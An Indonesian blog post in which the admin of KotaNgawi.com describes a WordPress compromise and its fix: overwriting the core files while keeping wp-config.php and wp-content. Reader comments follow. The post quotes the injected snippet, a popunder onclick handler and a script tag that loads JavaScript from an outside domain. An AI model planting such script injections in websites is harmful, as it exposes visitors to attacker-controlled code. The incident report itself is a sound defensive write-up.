Script Inject WordPress

Sudah lebih seminggu situs resmi Komunitas Blogger Ngawi, KotaNgawi.com, kena inject script. Awalnya saya tidak curiga karena tampilan dan fitur-fitur masih tetap berjalan normal, sampai kopdar kecil saya, sagung dan zebhi di kalijogo, mereka mengatakan bahwa gaiso login neng Kota Ngawi. Sehingga tidak bisa update berita terbaru.

Ternyata begitu saya coba akses wp-admin ternyata benar, yang muncul hanya white blank screen . Beberapa saat agak tegang juga, ketika saya buka page source muncul script mencurigakan di deretan paling atas, sehingga ketika kotangawi dibuka meload script dibawah ini :

<body onclick="popunder();">
<script type="text/javascript" src="http://pshaos.co.cc/querys.js">
</script></body>

Daripada susah ngotak-ngatik goleki penyebabe langsung saya timpa file wordpress yang ada di folder installasi dengan file baru. Tapi tunggu dulu.. jika anda mengalami hal ini jangan timpa file wp-config.php dan folder wp-content, sehingga anda tidak perlu install ulang wordpress anda.

Alhamdulillah setelah saya lakukan semua berjalan normal dan lancar, sehingga KotaNgawi.com sudah bisa diakses dengan mudah tur wes iso update lagi.

You may also like

31 Comments

  1. alhamdulilah kalau udah ketemu masalahnya trus bisa terus update … dan kota ngawi bisa lancar untuk prosesnya….. kalau blogspot bisa gak kena jail kayak gitu heheheh….

  2. kadang yg parah malah wp-admin di ambil alih, itu smua karna kelemahan security server hosting kita (‘kata pelakunya’), jd spertinya percuma security web/blog kalau server yg ga aman, kejadian di beberapa blog sy yg lain selain blogkublogmu.com yang lg nawarin link balik gratis, he he he, moga ga kejadian n di kerjai cracker, wih cape !

Leave a Reply

Your email address will not be published. Required fields are marked *